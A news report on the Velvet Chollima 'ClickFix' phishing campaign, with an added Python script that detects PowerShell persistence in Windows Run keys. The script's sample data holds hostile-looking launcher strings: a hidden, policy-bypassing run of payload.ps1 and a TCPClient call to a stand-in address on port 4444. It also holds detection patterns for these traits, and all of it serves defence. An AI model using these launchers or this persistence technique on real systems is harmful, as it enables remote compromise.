Velvet Chollima APT Hackers Target Government Officials Using Weaponized PDFs

The DPRK-linked Velvet Chollima Advanced Persistent Threat (APT) group has launched a sophisticated cyberattack campaign targeting South Korean government officials, as well as NGOs, government agencies, and media organizations across North America, South America, Europe, and East Asia.

Initiated in January 2025, this attack, detailed by Microsoft’s Threat Intelligence team and reported by Bleeping Computer, leverages spear-phishing emails with weaponized PDF attachments to deceive victims into executing malicious code.

The campaign introduces a novel social engineering tactic known as “ClickFix,” designed to trick users into running PowerShell commands as administrators, ultimately granting attackers remote access to compromised systems.

Sophisticated Spear-Phishing Campaign

The attack begins with a meticulously crafted spear-phishing email, often masquerading as correspondence from South Korean government officials to build trust with targets over time.

Embedded within the email is a PDF attachment containing a hidden hyperlink that redirects victims to a fraudulent CAPTCHA verification page.

[Image: fake CAPTCHA verification page used in the Velvet Chollima campaign]

This deceptive interface mimics legitimate security checks, prompting users to confirm they are “not a robot.”

However, upon interaction, a JavaScript function triggers a popup with instructions to execute a series of PowerShell commands, which are conveniently copied to the victim’s clipboard for ease of use.

A Deceptive Attack Chain

Unbeknownst to the user, following these instructions establishes a reverse shell connection to the attacker’s command and control (C2) server, allowing remote execution of commands on the infected machine.

To ensure persistence, the malicious script embeds itself into the Windows registry via the Run Key, guaranteeing reactivation upon every system reboot.

According to the report, this multi-stage attack chain exemplifies the cunning social engineering tactics employed by Velvet Chollima, exploiting human psychology to bypass traditional security defenses.

The culmination of this attack is the deployment of a reverse shell through a PowerShell script, often named payload.ps1, which creates a TCP connection to the attacker’s C2 server.

This connection enables Velvet Chollima operatives to exfiltrate sensitive data, install additional malware, and potentially propagate through corporate networks if the victim operates within such an environment.

The persistence mechanism, achieved through registry modifications, underscores the long-term threat posed by this campaign, as systems remain compromised even after restarts.
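The Run-key persistence described above leaves a recoverable trace on the host. The following is an added example (not code from the report or from Microsoft) of a defender-side check that scores Run-key values for the traits a ClickFix-style PowerShell launcher tends to carry: a hidden window, a bypassed execution policy, a script such as payload.ps1 dropped under the user profile, or a raw TCP client object. The Run-key entries, value names, paths and the 198.51.100.7 address are all constructed sample data.

```python
"""Score Windows Run-key entries for ClickFix-style PowerShell persistence traits."""
import re

# Constructed sample: value name -> command, as read from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Not real-world data.
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r'C:\Windows\system32\SecurityHealthSystray.exe',
    "WindowsUpdate": r'powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                     r'-File C:\Users\alice\AppData\Roaming\payload.ps1',
    "Updater": r'''powershell -w hidden -c "$c=New-Object Net.Sockets.TCPClient('198.51.100.7',4444)"''',
}

# Each indicator is one trait of the launcher; none is conclusive on its own.
INDICATORS = [
    ("powershell_launcher", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("hidden_window",       re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",       re.compile(r"-e(xecutionpolicy|p)?\s+bypass", re.I)),
    ("encoded_command",     re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("script_in_userdir",   re.compile(r'\\(AppData|Temp|Downloads)\\[^\s"]*\.ps1', re.I)),
    ("raw_tcp_client",      re.compile(r"Net\.Sockets\.TCPClient", re.I)),
]


def score_entry(command):
    """Return the names of all indicators matched by one Run-key command string."""
    return [name for name, rx in INDICATORS if rx.search(command)]


def find_suspicious(entries, min_hits=2):
    """Return {value_name: [indicators]} for entries that look like ClickFix persistence.

    A bare powershell.exe launcher is common in legitimate software, so an entry
    is reported only when it is a PowerShell launcher AND carries at least
    `min_hits` indicators in total.
    """
    flagged = {}
    for name, command in entries.items():
        hits = score_entry(command)
        if "powershell_launcher" in hits and len(hits) >= min_hits:
            flagged[name] = hits
    return flagged


if __name__ == "__main__":
    for name, hits in find_suspicious(SAMPLE_RUN_ENTRIES).items():
        print(f"[!] Run value {name!r}: {', '.join(hits)}")
```

On a live host the same scoring can be fed from the output of `reg query` or `Get-ItemProperty` on the Run key, or from Sysmon event ID 13 (registry value set) records.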

Microsoft’s Threat Intelligence team has highlighted the group’s use of deceptive error messages and fake device registration prompts, further amplifying the campaign’s effectiveness.

[Image: fake device registration link used in the Velvet Chollima campaign]

The broader implications are alarming, as the targeting of high-profile entities across multiple continents suggests a coordinated effort to gather intelligence or disrupt critical operations.

Organizations are urged to enhance email filtering, educate personnel on recognizing phishing attempts, and enforce strict policies against executing unsolicited commands.

As Velvet Chollima continues to refine its tactics with innovations like ClickFix, the cybersecurity community faces an escalating challenge to counter these persistent and evolving threats.

Vigilance and proactive defense strategies remain paramount in safeguarding against such insidious attacks that exploit both technological and human vulnerabilities.
